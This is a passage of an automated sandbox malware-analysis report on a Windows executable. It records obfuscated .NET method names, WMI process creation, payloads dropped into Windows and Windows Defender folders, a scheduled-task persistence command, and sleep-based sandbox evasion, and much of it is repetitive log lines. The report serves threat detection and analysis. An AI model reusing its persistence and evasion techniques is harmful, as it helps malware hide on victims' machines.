Source: QT4aLb3P98.exe, f0ZvaUfvgmw6viEubD.cs High entropy of concatenated method names: '_88Z', 'YZ8', 'ffV', 'G9C', 'tQlERI1lqF0nshJV9pM', 't7UbgB13gCa2DliJlnQ', 'ePMWq61QLfGVYZQIa1H', 'hvS9fd1YRCIH3lqnRja', 'U6vOq01uXVwqOPHVAna', 'tCvpxK1Ug0320TGMMuC'
Source: QT4aLb3P98.exe, vAvRw3K4pP2OrHcG5JZ.cs High entropy of concatenated method names: 'VOso1n30ofeUx125CoM', 'eKPAST3f4PbasB3DyFC', 'MydKWw3E7nZJhwuXVhd', 'F8tHrx3nL5hpFRQPinN', 'h7iyjBQ8C0', 'vm7ujZ380fPqpSrW2yo', 'l8QxET3dALdTuwuIw1A', 'JLvCnN3wFpUoG5HrIRu', 'z7wE6D3Klmmq36wMFNi', 'cZQr2d3G23NDMSWZwZl'
Source: QT4aLb3P98.exe, BTLjiFZ1TPXQi1ln8br.cs High entropy of concatenated method names: 'xpDtewtPFD', 'GtItVPqoj6', 'Nv1t1jsBrB', 'vL0tFAbidY', 'ViftXC0shI', 'IxlHxjSoxDu6ywfyCvd', 'ps5jMISm5igdRX18lt9', 'hHUq55kiOq3wbfMLZ61', 'kD1cm3kzh5qa8XA6jrD', 'HuuR9NSaLJWhxDtftgP'
Source: QT4aLb3P98.exe, VdeGXIIcFBlHTuEbpR.cs High entropy of concatenated method names: 'kcq', 'YZ8', '_4bQ', 'G9C', 'YTxKEh1hklpbQFU7jZN', 'VaQEex1q7acNT2MUpln', 'aGL4uL1RgYqv3CnFYGC', 'QgIGH81512hfiJvyTDQ', 'QBNYRO1cTG1f7DB3Vyw', 'j7l5LL1JQfh0nZMYdq2'
Source: QT4aLb3P98.exe, jKZ0VDNuv9wwwXiK5NM.cs High entropy of concatenated method names: 'R1x', 'YZ8', '_8U7', 'G9C', 'XdfRvBh897kAg3GxHtr', 'YVGKpQhdJb2SyiyN68K', 'EagAbrhwmBNAw3oYcQ5', 'cWf8lShKYRaPNI04wVL', 'w5rmhThG0fmSJLlEP9N', 'L8uka8hVEg0ZCCyih1Q'
Source: QT4aLb3P98.exe, X0Nd8igyK80AYELy4R.cs High entropy of concatenated method names: '_3OK', 'YZ8', '_321', 'G9C', 'j90UIAaIYl6CWSamMOs', 'zsfvj7aiMfikMG5ihEo', 'LgOjuEaztuM3PjcuWxC', 'l1d6KlFoHvqsHZHLxTW', 'jO2hi6FmCHdXBq14w0q', 'fL6lSOFanu1Ru14QvmE'
Source: QT4aLb3P98.exe, Bp4ZB3NWjZla5GrHXP7.cs High entropy of concatenated method names: 'yiQ', 'YZ8', '_5li', 'G9C', 'WOd5WfRoJxqdSlxXETE', 'zW4pO5RmuY2PkFfRied', 'WcuWc9RajpfxklqZDGG', 'v6mfHYRFRgMCk1eWkMj', 'NWLJd7ROj6jFhpVXnx3', 'ybpBIPR1NbAd7UymasB'
Source: QT4aLb3P98.exe, DBFF6cNcMUnhCquT18O.cs High entropy of concatenated method names: 'TnDZ1M33wb', 'wE8ZFPxa9w', 'y4CZXIVcpT', 'CWwhcJjJoKdkPDUVb8g', 'wKkPdej5mklbCClkTBX', 'grer40jcNcIPNBZxnFD', 'NBPIx6jjuZdrWCSOanX', 'nNyPLIj7E36K9QCeyVs', 'zVPy97jCa3Zr268LEY7', 'qfQ2TMjbWNPDNFfX7uN'
Source: QT4aLb3P98.exe, amB5IBNVT21egwIQ4uC.cs High entropy of concatenated method names: 'gHL', 'YZ8', 'vF9', 'G9C', 'smIct9REaSMrsgduqch', 'EBVi6SRnqA2DECLYutN', 'BwAv8YR0411neRw4RSt', 'xguWtMRflw4eohOHPDv', 'feDIAYRMhaChlPsUuw8', 'EGG0rDRsjsH6VKKVPQg'
Source: QT4aLb3P98.exe, GjJqNONfLJn1EnSVkIw.cs High entropy of concatenated method names: 'AXEZp0osTL', 'j3uq5ajhHwclq0uVjSl', 'S6CXRWjqWpymJ8cRCeU', 'DTbvAajOOMPvgFhfWh4', 'J1jRJHj1fwFw0lotXro', 'qRlbgcjRnssUeZhvZb4', '_5q7', 'YZ8', '_6kf', 'G9C'
Source: QT4aLb3P98.exe, z4Q5Xb8HQoib0P58lWy.cs High entropy of concatenated method names: 'giwXBpB57h', 'EglXvf3GJ4', 'qxPXhU3pM8', 'nhhXQ7P4cy', 'xVFXiCFN6p', 'ty9P36DMJcapQwcrpH1', 'tvQ3ujD0SP8FY6pM94q', 'gCe0h0Dfxut3lJppkLH', 'VST3hUDs70XwFW8Bt75', 'JwLyhDD8hxwmXkxY70O'
Source: QT4aLb3P98.exe, LkOdUWuIRPdAfy4FVCp.cs High entropy of concatenated method names: '_9YY', '_57I', 'w51', 'juYeJXI4pv', '_168', 'tM3oEVNnJH7whO1W3KK', 'QlnW7AN0n82K1Z2FeOC', 'BGMVT7NfX4LZFgBFtO1', 'tycAraNM38JcAY5Qwa6', 'xiVNg0NslDblaqPyqfp'
Source: QT4aLb3P98.exe, vC283A89eGfXw91Enbe.cs High entropy of concatenated method names: '_14Y', 'b41', 'D7Y', 'xMq', 'i39', '_77u', '_4PG', '_5u8', 'h12', '_2KT'
Source: QT4aLb3P98.exe, kC8ruJY2wXCeCi0Zmua.cs High entropy of concatenated method names: 'zWyH0bjoyJ', 'm7GH3EwwEj', 'RYtHoFS2Mx', '_3Gf', '_4XH', '_3mv', '_684', '_555', 'Z9E', 'BXlHxrcgpi'
Source: QT4aLb3P98.exe, uqhbAr8LI1LKAoANRxZ.cs High entropy of concatenated method names: 'lAYrJy2Ewl', 'jY3oxfD2nrdm0QwxifS', 'QsUdgSDv3pQc1UTUuQx', 'KExcWVDXlmZVQ1fsa9D', 'BXcp1cDIwb9WoenMeEb', 'YZE9a0Di7LatiPPXt9c', 'Q0wNcvDzTdP3CAF4hvb'
Source: QT4aLb3P98.exe, SfTBeSNjc7p3pKOouCM.cs High entropy of concatenated method names: 'rU3', 'YZ8', 'M54', 'G9C', 'IIo6r3qAtG2HrL05GF8', 'OWPhaaqHyQ14lavkLTC', 'SrWmDhqpc2MjQrgbHuA', 'YZHvJjqWnxywXIWS5Sp', 'UPWgrFqTLlHH66vqhpU', 'DEYhhJqlGQ2pxgjEIG2'
Source: QT4aLb3P98.exe, lwOADkzMmEhwsmc6g4.cs High entropy of concatenated method names: 'Y29', 'YZ8', 'jn6', 'G9C', 'unwTcDhF5g3L7cYY3Xh', 'LeGHHFhOZw3SYQRbLI2', 'cBSmmqh1Gkxx6quCWUL', 'tMPDP6hhNUL4IE8paOk', 'RaY1YDhqUuNg6jloxwJ', 'HkdURPhRVihAdVvYu7V'

Persistence and Installation Behavior
barindex
Creates processes via WMI
Source: C:\Users\user\Desktop\QT4aLb3P98.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\QT4aLb3P98.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\QT4aLb3P98.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\QT4aLb3P98.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\QT4aLb3P98.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\QT4aLb3P98.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Windows\System32\cmd.exe Executable created and started: C:\Windows\Media\Sonata\wRRcPdViqk.exe Jump to behavior
Drops PE files
Source: C:\Users\user\Desktop\QT4aLb3P98.exe File created: C:\Windows\Media\Sonata\wRRcPdViqk.exe Jump to dropped file
Source: C:\Users\user\Desktop\QT4aLb3P98.exe File created: C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Users\user\Desktop\QT4aLb3P98.exe File created: C:\Windows\Media\Sonata\wRRcPdViqk.exe Jump to dropped file

Boot Survival
barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wRRcPdViqkw" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe'" /f
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Memory allocated: 16E0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Memory allocated: 1B270000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Memory allocated: 1360000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Memory allocated: 1AEE0000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Memory allocated: 820000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Memory allocated: 1A4D0000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Memory allocated: 12D0000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Memory allocated: 1AFB0000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Thread delayed: delay time: 599891 Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Thread delayed: delay time: 599782 Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Window / User API: threadDelayed 1304 Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Window / User API: threadDelayed 945 Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Window / User API: threadDelayed 369 Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Window / User API: threadDelayed 359 Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Window / User API: threadDelayed 1014 Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Window / User API: threadDelayed 899 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\QT4aLb3P98.exe TID: 6576 Thread sleep count: 1304 > 30 Jump to behavior
